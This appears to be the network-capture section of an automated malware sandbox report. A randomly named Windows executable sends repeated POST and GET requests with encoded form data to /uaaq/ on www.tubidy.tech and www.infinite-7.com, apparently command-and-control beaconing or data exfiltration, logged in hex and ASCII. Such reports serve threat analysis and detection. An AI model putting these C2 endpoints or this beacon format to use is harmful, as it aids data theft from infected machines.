                                                                                    Dec 4, 2023 12:04:14.860255957 CET1340INData Raw: 63 2d 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e
                                                                                    Data Ascii: c-2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                    Dec 4, 2023 12:04:14.860292912 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                    Dec 4, 2023 12:04:14.860322952 CET1340INData Raw: 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20
                                                                                    Data Ascii: erved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <
                                                                                    Dec 4, 2023 12:04:14.860357046 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c
                                                                                    Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo
                                                                                    Dec 4, 2023 12:04:14.860384941 CET1340INData Raw: 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                    Dec 4, 2023 12:04:14.860410929 CET1340INData Raw: 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: a href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width=
                                                                                    Dec 4, 2023 12:04:14.860435963 CET1340INData Raw: 30 31 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e
                                                                                    Data Ascii: 01h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g
                                                                                    Dec 4, 2023 12:04:14.860461950 CET1340INData Raw: 37 2c 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: 7,25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-
                                                                                    Dec 4, 2023 12:04:15.031668901 CET1340INData Raw: 20 20 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c
                                                                                    Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.11.3049763146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:20.455537081 CET689OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 7a 64 6a 45 64 41 74 4d 5a 49 68 6d 74 72 4e 62 6b 6d 62 52 7a 32 6f 2f 61 74 70 57 64 63 38 38 48 62 59 53 64 58 66 4e 2f 66 68 69 38 51 53 42 63 52 43 31 56 79 54 59 5a 35 77 73 65 63 59 4b 65 38 4f 4a 6b 55 51 6b 47 51 73 2f 70 74 79 41 33 6e 6c 53 33 71 54 7a 56 59 54 66 6c 4f 44 62 70 6f 45 33 32 4c 57 69 67 77 56 59 76 36 72 4d 38 42 50 68 69 71 6b 63 42 52 32 6a 4d 71 57 4d 61 61 56 4c 72 71 55 31 57 71 4f 57 79 38 6c 58 51 31 37 4a 55 32 2f 4f 4d 55 73 43 69 59 59 58 4f 6b 6c 63 59 4d 41 73 68 4d 41 74 34 45 4e 39 42 41 3d 3d
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtrNbkmbRz2o/atpWdc88HbYSdXfN/fhi8QSBcRC1VyTYZ5wsecYKe8OJkUQkGQs/ptyA3nlS3qTzVYTflODbpoE32LWigwVYv6rM8BPhiqkcBR2jMqWMaaVLrqU1WqOWy8lXQ17JU2/OMUsCiYYXOklcYMAshMAt4EN9BA==
                                                                                    Dec 4, 2023 12:04:20.578823090 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:20 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.11.3049764146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:23.104180098 CET709OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 7a 64 6a 45 64 41 74 4d 5a 49 68 6d 74 4b 64 62 6d 48 62 52 34 32 6f 38 51 4e 70 57 55 38 38 34 48 62 55 53 64 56 7a 6a 2b 74 46 69 39 31 32 42 64 54 36 31 57 79 54 59 53 5a 78 6e 41 73 59 46 65 38 54 71 6b 56 38 6b 47 51 49 2f 70 76 61 41 33 51 35 54 34 61 54 4c 64 34 54 64 36 65 44 62 70 6f 45 33 32 4c 43 4d 67 77 64 59 76 4b 37 4d 2f 6b 6a 69 39 61 6b 64 45 68 32 6a 48 4b 57 32 61 61 56 54 72 76 4d 50 57 6f 47 57 79 39 31 58 51 6b 37 4b 64 32 2f 55 43 30 74 4c 74 49 4a 36 48 33 41 41 59 63 41 75 6d 5a 70 74 39 52 68 75 47 77 4d 37 59 54 4e 47 62 6b 75 4f 66 35 56 62 73 4b 75 55 76 5a 6f 3d
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtKdbmHbR42o8QNpWU884HbUSdVzj+tFi912BdT61WyTYSZxnAsYFe8TqkV8kGQI/pvaA3Q5T4aTLd4Td6eDbpoE32LCMgwdYvK7M/kji9akdEh2jHKW2aaVTrvMPWoGWy91XQk7Kd2/UC0tLtIJ6H3AAYcAumZpt9RhuGwM7YTNGbkuOf5VbsKuUvZo=
                                                                                    Dec 4, 2023 12:04:23.226279974 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:23 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.11.3049765146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:25.747078896 CET1626OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 7a 64 6a 45 64 41 74 4d 5a 49 68 6d 74 4b 64 62 6d 48 62 52 34 32 6f 38 51 4e 70 57 55 38 38 34 48 62 55 53 64 56 7a 6a 2b 74 4e 69 39 48 2b 42 63 79 36 31 58 79 54 59 62 35 78 6b 41 73 59 63 65 38 4b 6a 6b 55 41 65 47 53 41 2f 6f 4f 36 41 2b 43 52 54 76 71 54 4c 52 59 54 59 6c 4f 43 52 70 6f 30 37 32 4c 53 4d 67 77 64 59 76 49 7a 4d 6f 68 50 69 75 4b 6b 63 42 52 32 56 4d 71 58 34 61 62 78 70 72 72 51 66 58 5a 6d 57 38 38 46 58 57 57 54 4b 46 6d 2f 4b 50 55 74 54 74 49 46 35 48 33 64 35 59 63 46 4c 6d 65 6c 74 74 47 45 57 58 42 6b 79 4f 6c 4a 34 64 67 2b 56 54 4f 68 2b 2f 61 69 7a 35 4f 51 43 37 4b 2f 30 73 41 56 35 52 74 42 6d 37 49 77 62 52 6e 4b 63 7a 66 4d 73 4b 51 32 4b 6a 59 37 59 53 58 50 64 4e 67 6b 30 64 31 78 67 68 36 35 4a 39 30 71 30 58 48 6c 68 37 38 56 4e 50 62 71 76 6a 7a 62 31 62 4e 46 68 6a 56 4b 48 64 74 43 44 52 74 52 64 31 52 51 42 67 50 4f 32 7a 51 5a 4f 32 62 49 30 67 70 6c 68 38 61 67 61 30 43 64 33 50 37 6f 52 63 2f 6d 50 4b 71 59 6a 34 34 4b 44 33 48 50 32 61 73 37 63 55 44 4f 76 7a 31 70 61 6d 6a 4d 4f 71 62 49 35 4b 55 58 7a 69 2f 6b 4e 72 63 62 78 52 71 75 70 46 53 50 33 36 65 6a 38 34 41 54 4a 33 39 44 58 64 46 58 59 44 42 4e 7a 4b 50 53 45 30 61 36 41 50 76 36 71 32 5a 47 49 73 52 73 4f 31 33 57 64 33 78 2b 55 38 75 63 57 78 6f 33 31 52 59 70 54 70 7a 50 31 45 35 32 34 64 33 66 65 46 66 62 30 33 34 34 63 39 70 64 64 4f 4d 75 73 34 36 65 69 68 6a 4d 49 56 4f 4f 71 32 42 34 75 6e 6b 4c 70 59 35 4e 41 30 53 4b 46 6b 35 4b 6d 4c 72 79 47 70 4c 61 6e 62 35 35 46 30 45 2b 73 71 46 55 76 4c 67 78 55 37 66 4c 41 4e 75 39 70 65 79 61 6f 78 4b 70 4e 4c 49 79 48 47 70 6f 6f 39 31 65 71 56 30 38 57 61 64 72 5a 39 2f 55 34 6e 54 4f 6b 4c 39 51 6b 70 34 39 34 2f 52 47 71 37 67 7a 38 76 68 4a 70 66 30 45 72 35 64 4f 35 76 37 67 31 59 4e 41 5a 30 6d 4b 75 45 47 58 6f 56 6c 76 53 37 39 4f 6c 35 65 34 4b 6f 4c 71 7a 56 74 33 45 35 4d 4f 4f 75 77 6d 45 48 67 4e 47 78 68 4c 4f 45 42 6a 65 55 67 74 33 75 49 4a 58 4a 78 66 46 37 57 52 51 38 78 72 73 52 4f 48 66 34 53 42 45 4f 4b 75 58 74 6e 50 52 77 54 4d 37 75 4d 30 64 71 62 45 4a 4a 7a 79 69 79 4c 35 51 30 47 35 51 6b 74 69 5a 68 56 77 72 71 55 55 74 4f 68 4d 66 67 57 66 64 33 73 51 5a 59 34 76 42 63 41 4e 47 67 75 58 31 63 71 53 71 66 79 31 58 79 4c 64 5a 37 58 4c 33 32 54 2f 78 5a 4e 43 39 6f 7a 30 64 70 38 61 76 66 51 50 78 46 34 4a 55 31 7a 37 62 72 62 7a 4c 4a 62 4d 2b 4b 66 54 36 30 5a 34 76 4a 38 4b 32 75 44 65 43 57 67 46 67 41 6d 55 58 34 6c 46 49 78 6c 76 52 73 49 31 62 6d 43 37 52 2f 36 56 4b 66 43 37 49 56 4d 72 53 57 4f 4c 34 42 56 48 6d 66 50 71 46 64 61 35 6e 69 48 65 6b 55 4e 38 39 30 48 4c 6d 55 58 50 2b 6a 48 42 42 6c 41 62 39 56 6b 35 61 33 49 54 56 47 4d 61 2f 67 52 79 56 62 51 5a 4b 46 33 6c 4c 38 7a 4e 67 4a 6c 78 35 70 59 51 76 33 56 6f 65 4e 37 66 38 74 6c 38 31 48 2f 36 35 59 45 51 35 36 7a 77 7a 69 6e 78 4e 78 65 6f 63 78 70 44 4c 62 58 56 75 68 44 67 73 42 75 69 48 35 78 6a 51 72 39 50 43 4c 62 36 6e 50 43 74 61 50 6e 79 36 46 4b 61 4d 4f 6a 2f 45 76 61 54 48 50 35 32 58 55 34 4a 2f 5a 53 70 43 79 4c 70 52 61 47 50 31 32 43 6b 67 6e 51 75 62 71 4e 61 4a 68 30 58 55 58 47 7a 58 6f 6a 36 36 4a 47 48 77 70 32 33 56 4d 56 38 4c 65 48 69 48 61 4f 43 6d 69 56 6a 62 4d 6a 75 37 32 71 76 55 53 7a 4b 4b 74 32 70 65 6d 32 77 5a 56 56 67 57 63 44 72 54 2b 6d 37 52 46 54 74 76 62 53 46 6d 4e 69 69 2b 75 63 33 30
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtKdbmHbR42o8QNpWU884HbUSdVzj+tNi9H+Bcy61XyTYb5xkAsYce8KjkUAeGSA/oO6A+CRTvqTLRYTYlOCRpo072LSMgwdYvIzMohPiuKkcBR2VMqX4abxprrQfXZmW88FXWWTKFm/KPUtTtIF5H3d5YcFLmelttGEWXBkyOlJ4dg+VTOh+/aiz5OQC7K/0sAV5RtBm7IwbRnKczfMsKQ2KjY7YSXPdNgk0d1xgh65J90q0XHlh78VNPbqvjzb1bNFhjVKHdtCDRtRd1RQBgPO2zQZO2bI0gplh8aga0Cd3P7oRc/mPKqYj44KD3HP2as7cUDOvz1pamjMOqbI5KUXzi/kNrcbxRqupFSP36ej84ATJ39DXdFXYDBNzKPSE0a6APv6q2ZGIsRsO13Wd3x+U8ucWxo31RYpTpzP1E524d3feFfb0344c9pddOMus46eihjMIVOOq2B4unkLpY5NA0SKFk5KmLryGpLanb55F0E+sqFUvLgxU7fLANu9peyaoxKpNLIyHGpoo91eqV08WadrZ9/U4nTOkL9Qkp494/RGq7gz8vhJpf0Er5dO5v7g1YNAZ0mKuEGXoVlvS79Ol5e4KoLqzVt3E5MOOuwmEHgNGxhLOEBjeUgt3uIJXJxfF7WRQ8xrsROHf4SBEOKuXtnPRwTM7uM0dqbEJJzyiyL5Q0G5QktiZhVwrqUUtOhMfgWfd3sQZY4vBcANGguX1cqSqfy1XyLdZ7XL32T/xZNC9oz0dp8avfQPxF4JU1z7brbzLJbM+KfT60Z4vJ8K2uDeCWgFgAmUX4lFIxlvRsI1bmC7R/6VKfC7IVMrSWOL4BVHmfPqFda5niHekUN890HLmUXP+jHBBlAb9Vk5a3ITVGMa/gRyVbQZKF3lL8zNgJlx5pYQv3VoeN7f8tl81H/65YEQ56zwzinxNxeocxpDLbXVuhDgsBuiH5xjQr9PCLb6nPCtaPny6FKaMOj/EvaTHP52XU4J/ZSpCyLpRaGP12CkgnQubqNaJh0XUXGzXoj66JGHwp23VMV8LeHiHaOCmiVjbMju72qvUSzKKt2pem2wZVVgWcDrT+m7RFTtvbSFmNii+uc30
                                                                                    Dec 4, 2023 12:04:25.870686054 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:25 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.11.3049766146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:28.400446892 CET423OUTGET /uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:28.523761988 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:28 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.11.304976791.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:33.921359062 CET698OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4f 6f 4e 6b 33 6c 63 79 54 45 42 74 67 34 79 63 6e 72 68 59 41 54 33 5a 57 6d 33 7a 73 48 45 77 66 32 31 74 75 30 77 72 51 49 2b 6b 63 59 62 38 66 31 6f 64 4f 78 35 53 31 4d 49 7a 42 36 57 46 49 2f 43 2f 59 75 6f 36 2b 43 33 72 43 59 31 5a 30 78 67 55 2b 62 4d 74 64 2f 63 33 70 38 59 4b 43 46 7a 32 4f 43 57 36 34 74 6d 35 2b 68 6f 70 4a 64 72 77 72 61 6a 4a 49 6f 35 36 73 55 75 65 74 69 55 78 68 6f 49 62 46 50 35 58 64 72 37 6e 77 69 6c 47 39 44 34 61 75 52 34 4b 69 45 75 67 71 33 51 76 79 55 76 4a 58 4b 6e 70 34 7a 38 70 67 3d 3d
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtg4ycnrhYAT3ZWm3zsHEwf21tu0wrQI+kcYb8f1odOx5S1MIzB6WFI/C/Yuo6+C3rCY1Z0xgU+bMtd/c3p8YKCFz2OCW64tm5+hopJdrwrajJIo56sUuetiUxhoIbFP5Xdr7nwilG9D4auR4KiEugq3QvyUvJXKnp4z8pg==
                                                                                    Dec 4, 2023 12:04:34.104410887 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:04:34 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.11.304976891.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:36.630407095 CET718OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4f 6f 4e 6b 33 6c 63 79 54 45 42 74 41 49 79 61 30 54 68 51 41 54 77 57 32 6d 33 35 4d 47 73 77 66 71 31 74 76 67 67 72 6c 59 2b 6b 38 6f 62 37 75 31 6f 51 75 78 35 64 56 4d 4e 39 68 36 4e 46 49 6a 77 2f 59 53 6f 36 2b 47 33 72 44 6f 31 5a 48 5a 6a 47 65 62 4f 72 64 2f 61 30 5a 38 59 4b 43 46 7a 32 4b 76 42 36 34 31 6d 36 4f 52 6f 72 6f 64 6f 73 37 61 6b 66 34 6f 35 72 38 56 47 65 74 69 36 78 67 30 75 62 41 4c 35 58 66 6a 37 6e 69 4b 69 52 4e 44 36 58 4f 51 77 63 6e 70 51 75 4c 7a 73 68 43 34 30 59 46 33 73 68 4e 66 76 75 57 65 55 52 6b 50 44 6e 57 75 74 54 41 56 4c 56 64 35 41 61 57 77 3d
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtAIya0ThQATwW2m35MGswfq1tvggrlY+k8ob7u1oQux5dVMN9h6NFIjw/YSo6+G3rDo1ZHZjGebOrd/a0Z8YKCFz2KvB641m6ORorodos7akf4o5r8VGeti6xg0ubAL5Xfj7niKiRND6XOQwcnpQuLzshC40YF3shNfvuWeURkPDnWutTAVLVd5AaWw=
                                                                                    Dec 4, 2023 12:04:36.813222885 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:04:36 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
